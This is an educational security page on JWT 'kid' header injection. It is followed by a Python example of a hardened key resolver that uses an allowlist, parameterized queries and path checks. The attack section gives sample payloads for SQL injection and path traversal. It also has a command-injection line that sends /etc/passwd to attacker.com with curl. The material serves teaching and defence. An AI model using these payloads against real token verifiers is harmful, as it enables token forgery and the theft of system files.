JWT Kid Injection

JWT Kid Injection exploits the "kid" (Key ID) header parameter when it's used unsafely to retrieve verification keys. If the kid value is used directly in SQL queries, file paths, or command execution, attackers can manipulate it for injection attacks.

How It Works

The kid header is intended to identify which key should be used for signature verification. If the server passes this value unsanitized into whatever backs its key store (a database query, a file path, or a shell command), attackers can inject values that change what that lookup does.

Attack Vectors

SQL Injection via kid

// Vulnerable query
SELECT key FROM keys WHERE kid = '[kid_value]'

// Attack payload
{"alg": "HS256", "kid": "1' UNION SELECT 'attackersecret' --"}

// Query becomes:
SELECT key FROM keys WHERE kid = '1' UNION SELECT 'attackersecret' --'

// Sign token with 'attackersecret'

Path Traversal via kid

// Server reads key file based on kid
key = file_read("/keys/" + kid)

// Attack payload
{"alg": "HS256", "kid": "../../../dev/null"}

// Sign with an empty key (reading /dev/null yields zero bytes, so the HMAC secret is empty)
// Or use a file with known content like /proc/sys/kernel/randomize_va_space

Command Injection via kid

// Vulnerable: kid used in shell command
{"alg": "HS256", "kid": "key1; curl attacker.com/$(cat /etc/passwd)"}

Prevention

  • Use parameterized queries for database lookups
  • Validate kid against allowlist of known key IDs
  • Sanitize kid to remove path traversal characters
  • Never use kid in shell commands
  • Store keys by index/ID, not by user-controlled name
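The following is an added example of a key resolver that applies the list above; it is not code from this page or from PentesterLab. It assumes an HS256-signed token, a constructed in-memory SQLite table standing in for the server's key database, and a constructed kid format policy (letters, digits, `_` and `-` only). The kid is checked against that pattern and an allowlist before it reaches the parameterized query or the key-file path, so the kid values shown in the attack vectors above are rejected with a loggable reason before any sink sees them.

```python
import base64
import hashlib
import hmac
import json
import re
import sqlite3
from pathlib import Path

# Constructed policy: a kid is an opaque identifier, so only a narrow
# character set is accepted. Everything else is rejected before the value
# can reach a query, a path, or any other sink.
KID_PATTERN = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(data: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


class KeyStore:
    """Resolves a kid to an HMAC secret via an allowlist and a bound query."""

    def __init__(self, keys: dict):
        # Constructed in-memory table standing in for the real key database.
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE keys (kid TEXT PRIMARY KEY, secret BLOB)")
        self.conn.executemany("INSERT INTO keys VALUES (?, ?)", list(keys.items()))
        self.allowed = frozenset(keys)

    def lookup(self, kid) -> bytes:
        if not isinstance(kid, str) or not KID_PATTERN.fullmatch(kid):
            raise ValueError("kid has an invalid format")
        if kid not in self.allowed:
            raise ValueError("kid is not a known key ID")
        # Parameterized query: kid is bound as data, never spliced into the SQL.
        row = self.conn.execute(
            "SELECT secret FROM keys WHERE kid = ?", (kid,)
        ).fetchone()
        if row is None:
            raise ValueError("kid is not a known key ID")
        return bytes(row[0])


def key_file_path(base_dir: Path, kid: str) -> Path:
    """Map a kid to a key file only after format and containment checks."""
    if not KID_PATTERN.fullmatch(kid):
        raise ValueError("kid has an invalid format")
    base = base_dir.resolve()
    candidate = (base / f"{kid}.key").resolve()
    # Defense in depth: even with the pattern check, confirm the resolved
    # path still sits directly inside the key directory.
    if candidate.parent != base:
        raise ValueError("kid escapes the key directory")
    return candidate


def sign_hs256(payload: dict, kid: str, secret: bytes) -> str:
    """Issue an HS256 token; used here only to build test inputs."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    seg = lambda d: b64url_encode(json.dumps(d, separators=(",", ":")).encode())
    signing_input = f"{seg(header)}.{seg(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs256(token: str, store: KeyStore) -> dict:
    """Verify an HS256 token, resolving the secret through the hardened store."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unsupported alg")
    secret = store.lookup(header.get("kid"))  # rejects injected kid values
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def check_token(token: str, store: KeyStore):
    """Return (ok, reason, claims); the reason is suitable for a log or alert line."""
    try:
        return True, "ok", verify_hs256(token, store)
    except ValueError as exc:
        return False, str(exc), None
```

Because the format check runs before the allowlist and the allowlist before the query, a kid carrying a quote, a slash or a semicolon never becomes a database error, a filesystem read or a process spawn; it surfaces as a single "invalid format" rejection that can be counted and alerted on.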
